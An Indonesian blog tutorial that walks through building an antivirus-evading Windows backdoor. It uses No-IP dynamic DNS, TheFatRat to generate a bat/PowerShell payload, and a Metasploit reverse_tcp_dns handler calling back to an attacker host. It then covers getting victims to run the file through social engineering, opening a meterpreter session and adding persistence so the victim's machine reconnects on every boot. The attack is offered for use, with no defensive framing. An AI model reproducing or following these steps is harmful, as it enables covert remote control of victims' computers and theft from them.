Membuat Backdoor Untuk Windows 7/8/10 (EXTERNAL NETWORK + PERSISTENCE + FUD
Jumat, 09 November 2018
Tulis Komentar
saya akan mengajari Anda cara membuat payload yang sederhana, tetapi itu dapat membantu banyak orang yang memulai.
Pertama kita akan membuat akun di NO-IP, untuk itu kita akan pergi http://www.noip.comdan membuat daftar kami.
Setelah menyelesaikan pendaftaran kami, kami pergi ke tab DNS Dinamis dan klik pada Tambahkan nama host, di sini Anda akan memilih nama untuk dns Anda, misalnya saya akan membuat put-nubychan, klik tambahkan nama, dan itu akan tetap lebih atau kurang jadi "nubychan.ddns.net".
Sekarang kita perlu mengunduh NO-IP agar selalu memutakhirkan ip kita ketika kita me-restart router kita, pergi ke halaman utama NO-IP dan klik unduh, unduh dan masuk ke folder yang diunduh, buka terminal di tempat menulis
sudo make instal
Dengan NO-IP dikonfigurasi, kita perlu mengunduh skrip TheFatRat, skrip ini yang akan membuat payload kita dan membiarkannya tidak terdeteksi.
Buka terminal Anda dan tulis
git clone https://github.com/Screetsec/TheFatRat
setelah unduhan selesai, masuk ke folder TheFatRat, di dalamnya buka folder setup, di folder ini Anda akan menemukan file bernama setup.sh, buka terminal dan tulis
sudo ./setup.sh
Setelah menyelesaikan proses instalasi dependensi, kembali ke folder Theatrat, buka terminal dan ketik
sudo bash ./fatrat
Ada, kita akhirnya ke bagian di mana kita membuat payload kami, di sini kita akan memilih Buat Fud Backdoor 1000% dengan PwnWinds [Excelent] akan tekan 6 dan kami akan masuk dalam bagian ini kita akan memilih opsi pertama, Buat file bat + Powershell (FUD 100%), untuk ini tekan 1 dan beri masukkan. TheFatRat akan meminta Anda untuk memasukkan LHOST, di sini Anda akan memasukkan DNS Anda yang kami buat di NO-IP, dalam kasus saya forum-hacker.ddns.net
Segera setelah ia meminta Anda untuk mengatur pintu, di sini Anda dapat memilih port, tetapi penting untuk diingat bahwa pintu yang Anda pilih, Anda harus rilis pada router Anda, karena jika tidak, kita tidak akan dapat terhubung masa depan , dengan mengingat hal ini saya akan mendigitalkan 4444 pori dan mari masuk.
Ini akan meminta Anda untuk memilih nama untuk file, saya akan menulis payload yang sama dan saya akan masuk pada waktu itu akan membuka jendela untuk Anda meminta untuk memilih payload yang ingin Anda gunakan, kita akan memilih Windows / meterpreter / reverse_tcp_dns press "OK" dan menunggu untuk itu untuk membuat payload, pada akhirnya ia akan menanyakan apakah Anda ingin berhenti, ketik ya dan tekan enter.
Sekarang mari kita mulai mengkonfigurasi Metasploit kami untuk membuat koneksi balik, buka terminal dan ketik
sudo service postgresql start
msfconsole
Ketika Metasploit terbuka, ketik
use exploit / multi / handler
Sekarang kita akan menulis
set PAYLOAD windows / meterpreter / reverse_tcp_dns
Sesampai di sini kami akan menggunakan perintah
show options
set LPORT XXXX
Sekarang mari setel DNS kami,
set LHOST nubychan.ddns.net
Akhirnya, mari kita tulis.
set ExitOnSession falae
Sekarang kita menulis
exploit -j
Inilah bagian yang sulit, korban kita membutuhkan beberapa cara untuk menjalankan payload.bat kita, bagian itu terserah Anda, menggunakan keterampilan rekayasa sosial atau sesuatu, ingatlah bahwa payload ini tidak terdeteksi hampir semua antivirus, Anda Anda bisa menggunakannya di mediafire misalnya.
Pokoknya, saat korban mengeksekusi payload kami, akan tampil lebih atau kurang dalam terminal
[*] Sending stage (X bytes) to xxx.xxx.xx (IP KORBAN) [*] Meterpreter session 1 opened (xxx.xxx. xx: xxx (IP ANDA: PORT) -> xxx.xxx.xx
Ketika ini muncul, itu berarti bahwa kita telah dapat menyerang, sekarang kita perlu memulai mode interaksi, dengan perintah
sesi -i 1
meterpreter>
Oke, kita sudah berinteraksi dengan mesin target, untuk menguji, Anda bisa memberi perintah
sysinfo
Komputer:
OS LAB1-PC : Windows 7 (Build 7601, Service Pack 1).
Arsitektur: x86
Sistem Bahasa: en_US
Domain: WORKGROUP
Masuk Pada Pengguna: 2
meterpreter: x86 / windows
Akhirnya kami membuat kegigihan cara, sehingga setiap kali korban menyalakan komputer, terhubung ke kita, maka kita tidak akan kehilangan Sekarang, mari kita jalankan perintahnya
run percistence -U i 5 -p 4444 -r nubychan.ddns.net
Baca Juga : Cara Membuat Backdoor Yang Tidak Terdeteks Sofware Anti Virus
Belum ada Komentar untuk "Membuat Backdoor Untuk Windows 7/8/10 (EXTERNAL NETWORK + PERSISTENCE + FUD"
Posting Komentar